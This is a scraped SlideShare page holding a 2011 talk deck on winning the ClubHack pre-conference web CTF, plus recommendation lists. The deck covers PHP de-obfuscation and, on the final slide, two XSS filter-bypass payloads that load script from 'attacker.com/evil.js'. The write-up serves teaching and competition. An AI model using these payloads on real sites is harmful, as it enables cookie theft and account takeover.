SlideShare uma empresa Scribd logo

How i-won-club hack-precon-ctf-v2

n|u - The Open Security Community
n|u - The Open Security Community

null December'11 Pune Meet

EducaçãoTecnologia
1 de 18
How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4

Recomendados

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 

Recomendados

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Php
PhpPhp
Phpanandha ganesh
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
PHP Presentation
PHP PresentationPHP Presentation
PHP PresentationJIGAR MAKHIJA
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP TutorialsYuriy Krapivko
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Php intro
Php introPhp intro
Php introJennie Gajjar
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL PresentationManish Bothra
 
Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Indonesia Infrastructure Initiative
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Mais conteúdo relacionado

Mais procurados

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 

Mais procurados (19)

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHP
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zend
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585
 
File inclusion
File inclusionFile inclusion
File inclusion
 
Php
PhpPhp
Php
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using Python
 
PHP Presentation
PHP PresentationPHP Presentation
PHP Presentation
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP Tutorials
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 Neos
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Php intro
Php introPhp intro
Php intro
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL Presentation
 

Destaque

January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Destaque (6)

Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market Report
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09
 
Ecoporanga
EcoporangaEcoporanga
Ecoporanga
 
CGI Proxy
CGI ProxyCGI Proxy
CGI Proxy
 
Louvre u geziyoruz
Louvre u geziyoruzLouvre u geziyoruz
Louvre u geziyoruz
 

Semelhante a How i-won-club hack-precon-ctf-v2

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009ClubHack
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Combell NV
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Abraham Aranguren
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015Jason Packer
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionYury Chemerkin
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$Joe Ferguson
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8Wim Godden
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short IntroductionAndy Grunwald
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4Wim Godden
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 

Semelhante a How i-won-club hack-precon-ctf-v2 (20)

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
 
Talking to Web Services
Talking to Web ServicesTalking to Web Services
Talking to Web Services
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permission
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Kohana 3.1
Kohana 3.1Kohana 3.1
Kohana 3.1
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short Introduction
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)
 
2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 

Mais de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mais de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Último

APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Disha Kariya
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024Janet Corral
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 

Último (20)

APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 

How i-won-club hack-precon-ctf-v2

  • 1. How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
  • 2. Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
  • 3. Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
  • 4. ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
  • 5. Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
  • 6. Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
